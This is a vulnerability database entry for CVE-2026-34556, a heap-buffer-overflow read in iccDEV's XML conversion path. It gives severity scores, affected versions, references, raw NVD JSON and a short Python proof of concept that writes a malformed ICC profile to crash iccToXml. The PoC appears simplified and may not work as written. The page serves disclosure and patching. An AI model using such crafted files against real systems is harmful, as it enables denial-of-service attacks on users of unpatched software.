CVE-2026-34556

Description

iccDEV provides a set of libraries and tools for working with ICC color management profiles. Prior to version 2.3.1.6, there is a heap-buffer-overflow (HBO) in icAnsiToUtf8() in the XML conversion path. The issue is triggered by a crafted ICC profile which causes icAnsiToUtf8(std::string&, char const*) to treat an input buffer as a C-string and call operations that rely on strlen()/null-termination. AddressSanitizer reports an out-of-bounds READ of size 115 past a 114-byte heap allocation, with the failure observed while running the iccToXml tool. This issue has been patched in version 2.3.1.6.

CVSS Details

CVSS Score

6.2

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:color:iccdev:*:*:*:*:*:*:*:* - VULNERABLE

iccDEV < 2.3.1.6

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# PoC for CVE-2026-34556
# This script generates a malformed ICC profile to trigger the Heap Buffer Overflow.
# The crafted file lacks null-termination in the data parsed by icAnsiToUtf8().

import struct

def create_malformed_icc(filename):
    # ICC Header (simplified)
    header = b'\x00' * 128
    # Set profile size and signature (mock data)
    header = struct.pack('>I', 256) + header[4:]
    # Tag table pointing to a non-null-terminated string
    # Offset 128, Size 200, Signature 'desc'
    tag_table = struct.pack('>4sII', b'desc', 128, 200)
    
    # Payload: 200 bytes of 'A' without null terminator
    payload = b'A' * 200
    
    with open(filename, 'wb') as f:
        f.write(header)
        f.write(tag_table)
        f.write(payload)

if __name__ == "__main__":
    create_malformed_icc('cve_2026_34556.icc')
    # Trigger: ./iccToXml cve_2026_34556.icc

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-34556
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-34556
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-34556/
[4] VulDB https://vuldb.com/cve/CVE-2026-34556
[5] https://github.com/InternationalColorConsortium/iccDEV/issues/734
[6] https://github.com/InternationalColorConsortium/iccDEV/pull/740
[7] https://github.com/InternationalColorConsortium/iccDEV/security/advisories/GHSA-p9wm-xfv4-43qg

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-34556", "sourceIdentifier": "[email protected]", "published": "2026-03-31T23:17:10.997", "lastModified": "2026-04-20T14:39:50.880", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "iccDEV provides a set of libraries and tools for working with ICC color management profiles. Prior to version 2.3.1.6, there is a heap-buffer-overflow (HBO) in icAnsiToUtf8() in the XML conversion path. The issue is triggered by a crafted ICC profile which causes icAnsiToUtf8(std::string&, char const*) to treat an input buffer as a C-string and call operations that rely on strlen()/null-termination. AddressSanitizer reports an out-of-bounds READ of size 115 past a 114-byte heap allocation, with the failure observed while running the iccToXml tool. This issue has been patched in version 2.3.1.6."}, {"lang": "es", "value": "iccDEV proporciona un conjunto de bibliotecas y herramientas para trabajar con perfiles de gestión de color ICC. Antes de la versión 2.3.1.6, existe un desbordamiento de búfer de pila (HBO) en icAnsiToUtf8() en la ruta de conversión XML. El problema se activa por un perfil ICC manipulado que hace que icAnsiToUtf8(std::string&, char const*) trate un búfer de entrada como una cadena C y llame a operaciones que dependen de strlen()/terminación nula. AddressSanitizer informa de una lectura fuera de límites de tamaño 115 más allá de una asignación de pila de 114 bytes, observándose el fallo al ejecutar la herramienta iccToXml. Este problema ha sido parcheado en la versión 2.3.1.6."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.2, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.5, "impactScore": 3.6}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-125"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:color:iccdev:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.3.1.6", "matchCriteriaId": "DE133F29-9592-4669-8B76-9F7C88EFE17D"}]}]}], "references": [{"url": "https://github.com/InternationalColorConsortium/iccDEV/issues/734", "source": "[email protected]", "tags": ["Issue Tracking", "Exploit", "Patch"]}, {"url": "https://github.com/InternationalColorConsortium/iccDEV/pull/740", "source": "[email protected]", "tags": ["Issue Tracking", "Patch"]}, {"url": "https://github.com/InternationalColorConsortium/iccDEV/security/advisories/GHSA-p9wm-xfv4-43qg", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}